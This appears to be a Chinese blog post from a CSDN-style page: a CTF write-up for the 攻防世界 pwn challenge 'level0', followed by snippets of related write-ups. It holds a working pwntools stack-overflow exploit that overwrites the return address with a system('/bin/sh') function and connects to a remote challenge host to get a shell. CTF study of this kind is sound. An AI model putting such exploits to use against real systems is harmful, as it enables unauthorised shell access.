[攻防世界 pwn]——level0

最新推荐文章于 2023-06-01 09:59:10 发布
原创 最新推荐文章于 2023-06-01 09:59:10 发布 · 301 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

这篇博客介绍了如何在开启NX保护的环境中,通过IDA分析找到`system(/bin/sh)`函数,并构造payload修改返回地址来执行shell。作者使用了Python的pwn库远程连接到靶机并发送payload,成功获得了交互式shell。
部署运行你感兴趣的模型镜像

[攻防世界 pwn]——level0

  • 题目地址: https://adworld.xctf.org.cn/
  • 题目:
    在这里插入图片描述
    checksec看下保护类型,开启了NX保护
    在这里插入图片描述
    IDA中看下,发现了system("/bin/sh")函数,返回地址修改为该函数就可以
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

exploit

from pwn import *
#p = process("./pwn")
p = remote("111.200.241.244",40322)
sys_addr = 0x0400596

payload = 'a'*(0x80+8) + p64(sys_addr)
p.sendline(payload)
p.interactive()

您可能感兴趣的与本文相关的镜像

Python3.9

Python3.9

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

攻防世界(pwn篇)---level0
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-13 1916
攻防世界(pwn篇)—level0 文章目录攻防世界(pwn篇)---level0题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.Stack: Canary found 表示不能直接用溢
攻防世界PWN-level0
Deeeelete的博客
11-12 3444
题目:level0 老规矩先进PE 查看是64位程序,可以考虑直接IDA莽,也可以进checksec查一下详细参数 比较脆,无PIE且没了栈保护(Stack-canary),容易GOT改写( RELRO) 简单运行一遍,发现是hello word 进64位IDA 鼠标悬停在main函数上按f5反编译 查看源码: 过于简单,没啥可用的信息,双击它return的脆弱函数进一步查看 int __cdecl main(int argc, const char **argv, const
攻防世界-pwn新手区-level0
CHAWUCIREN1的博客
07-26 367
下载附件,执行一下,64位程序 checksec一下 NX执行保护开启 丢进ida里面分析一下 F5反编译 发现return到一个函数里面,点击查看一下 发现申请的栈空间是0x80,read的值却是0x200,说明存在栈溢出 然后点击callsystem这个函数, 发现shell,也就是说我们需要利用栈溢出覆盖到callsystem函数的返回地址0x400596执行shell。 查看buf的栈空间 shell_addr = 0x400596 payload = ‘A’*(0x80+8) + p.
攻防世界PWN题——level0
Greic的博客
12-01 3719
嘿嘿,又是我,我又肥来了。今天带来的是攻防世界第三题的writeup,这次话不多说,我们直接进入主题。 无论怎么样,pwn题前两步少不了——查看文件类型和保护类型: 64位linux操作系统,只开了NX保护,再打开IDA看看。 将Hello,World显示到屏幕上,再点开函数看看: 可以看到,buf是分配了80个字节(从rbp-80-rbp+0),但是read函数读入了0x200字节,因此,这里明显有栈溢出,再点开buff看看: 可以看到,我们只需要将buf和s覆盖,也就...
攻防世界 Pwn level0
MrTreebook的博客
07-13 221
攻防世界pwn level0 下载本地文件拉到Kali 检查文件 file level0 checksec level0 没有开任何保护 拉进IDA看一下 在这里看到了 ”bin/sh" 可以在这里获取shell权限 目标明确 看到了vulnerable_function 很明显是栈溢出的操作 看一下栈空间 buf上需要覆盖 80-0+8 大小的数据 r 上弹 callsystem的地址即可 开始写exp ##coding=utf8 from pwn import * ## 构
攻防世界pwn——level3
qq_62076255的博客
11-05 890
攻防世界pwn——level3
攻防世界pwn——string
qq_62076255的博客
11-05 859
攻防世界pwn——string
攻防世界pwn——pwn-200
qq_62076255的博客
12-23 682
做题记录
攻防世界新——level3
weixin_62675330的博客
02-10 1648
攻防世界pwn新手区 level3 由题意可得可能跟libc有关。 ps:libc是Linux下的ANSI C的函数库。ANSI C是基本的C语言函数库,包含了C语言最基本的库函数。 引申: glibc 和 libc 都是 Linux 下的 C 函数库。 libc 是 Linux 下的 ANSI C 函数库;glibc 是 Linux 下的 GUN C 函数库。 1.checksec查看保护 文件有两个,一个是elf文件,一个是so文件。 ps:so文件(shared object),so文件是
攻防世界 pwn——pwnstack
CNS-Enterprise BCC-1701-J
06-01 1639
攻防世界 做题练习
攻防世界pwn新手练习区——level0
smsyz2019的博客
10-31 1781
这是一个简单的利用栈溢出漏洞进行简单的ROP 下载附件,将程序放进虚拟机中 拿到程序首先检查程序开启了什么保护,输入 checksec 程序名称 checksec level0 可以看到这是一个64位程序,只开启了NX保护。NX保护简单来说就是代码不可执行。 例如你向栈上输入一段shellcode,那么NX保护就是防止这个shellcode的执行。 具体内容和其他的程序保护可以参考这个博客。l...
攻防世界pwn新手练习(level0
BurYiA的博客
10-24 1059
level0 老规矩哦,我们先checksec一下,收集一下信息 64位程序,开了NX,没啥说的,还在接受范围内,运行一下试试 唔,没啥东西,继续IDA吧。(╯‵□′)╯︵┴─┴ emmm,主函数倒是挺简单的,就一行打印,一行输入 但…不知你们有米有发现有个很奇怪的函数名,我们悄悄的瞅一瞅 果然不对劲,首先它的名字中有个system(手动加粗),这个是什么东西嘞,简单的来说,它拥有系统的最高...
攻防世界新手题(PWN——level0
0pt1mus
12-19 1225
level0 转载自:superj.site的博客 0x00 首先,进行通过file判断附件文件类型。 判断是ELF文件。这时就可以通过checksec判断文件的保护措施。 得到只开启了执行保护,地址随机化、栈保护都没有开启。 0x01 开始IDA逆向分析。 在其中发现了main、vulnerable_function、callsystem函数逐个查看这三个函数。 发现该题中用到了w...
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1693
学习pwn开始,慢慢来不要急
pwn_level0
qq_42956710的博客
08-15 2728
level0(deepin解题记录) 打开链接: 判断了下文件类型及其保护 在终端里面运行一下: 64位的,所以就用idax64打开 看一下数据位置: 其中有bin/sh, 里面有几个函数需要看看,callsystem,main,read,vulnerable_function 栈溢出,由于没有NX保护和开栈保护,为了得到shell,可以找一个输入没有限制的...
xctf攻防世界pwn level0的断点调试
你的小粉丝的博客
07-24 908
level0文件拖入Ubuntu桌面 打开终端:输入cd DESKtop/ gdb level0 开始运行 start 得到如图所示 断点调试 切换到Windows系统,用ida64打开level0 找到main函数的地址,复制 在Ubuntu终端下执行命令:b *0x+刚复制的地址 执行结果如图: 按r运行至断点处 其他命令 ...
(Jarvis Oj)(Pwn) level0
Nothing
04-17 1277
(Jarvis Oj)(Pwn) level0 首先用checksec查一下保护。几乎没开什么保护措施。 用ida反汇编。main函数就调用了两个函数。 跟进第二个函数。 找到溢出点,同过buf缓冲区。又找到函数callsystem()。 只要控制程序返回到callsystem地址即可。找到callsystem地址。 写得脚本。 1 from pwn ...
攻防世界pwn新手练习区-level0
优快云_sunrise的博客
08-29 544
level0查看基本信息并运行文件在IDA中分析exp 查看基本信息并运行文件 查看文件类型: file level0 查看保护: checksec --file=level0 运行文件:./level0 该文件在我的电脑中的文件名为level0 在IDA中分析 文件64位,将其拖入64位ida中。 按Space切换视图 按F5生成伪代码 发现另外一个函数: 分析: 我们只需要调用callsystem()函数就可以得到flag,而vulnerable_function()函数中调用了read()函数,
攻防世界pwnlevel0
Sakura给爷pwn全场
09-02 391
查壳64bit 拖进IDA f5查看伪代码 vulnerable_function中文译为脆弱函数,可疑,点进去查看vulnerable函数。 buf数组距离栈帧顶部rsp为0h,距离栈帧顶部rbp为80h,可知buf长度为0x80. 查看vulnerable函数栈 s代表save ebp,长度8个字节 r代表return address,长度8个字节,通常只要覆盖4个字节。 查看callsystem函数,代码段地址为0x400596 思路 把return address用callsystem函数
攻防世界pwn题目
最新发布
03-08
### 关于CTF PWN题目解题思路 在攻防世界的CTF竞赛中,PWN类题目通常涉及对二进制程序漏洞的挖掘与利用。这类题目旨在考察参赛者对于常见安全漏洞的理解以及编写有效载荷(Payload)的能力。 #### 格式化字符串漏洞及其应用实例 格式化字符串漏洞是一种常见的缓冲区溢出之外的安全隐患,在某些情况下可以被用来执行任意代码或泄露敏感信息。当应用程序未能正确处理用户输入作为格式说明符时就会发生这种类型的错误[^2]。例如,在`printf()`函数调用过程中如果允许外部控制其参数,则可能导致未预期的行为。 #### 利用返回导向编程技术实现GetShell 为了完成level2级别的挑战并最终获得shell访问权限,选手可能需要运用ROP(Return-Oriented Programming)技巧来绕过现代操作系统所实施的各种保护机制,比如DEP(Data Execution Prevention)[^1]。通过精心构建一系列gadget链表,可以在不修改原始二进制文件的情况下改变程序流从而达到特定目的——即获取目标系统的完全控制权。 #### 成功案例分析 有记录显示某位参与者成功解决了名为CyberPeace的比赛项目,并得到了标志性的胜利消息:“cyberpeace{66c82e120023fc25f9ab807a58058288}”。这表明该名玩家不仅掌握了必要的理论知识而且能够实际操作以达成既定的目标[^3]。 ```python from pwn import * # 这里仅提供一个简单的框架用于理解如何设置环境变量和连接远程服务器 def exploit(): context.log_level = 'debug' # 设置target IP 和 port target_ip = "example.com" target_port = 1234 # 创建process对象 或 remote 对象取决于比赛给出的信息 conn = remote(target_ip, target_port) # 发送payload前先交互一些初始命令/数据... conn.recvuntil(b'prompt>') payload = b'A'*offset + rop_chain() # offset 是偏移量;rop_chain 函数生成ROP gadget序列 conn.sendline(payload) # 获取shell后可继续发送其他指令直到结束会话 conn.interactive() if __name__ == "__main__": exploit() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值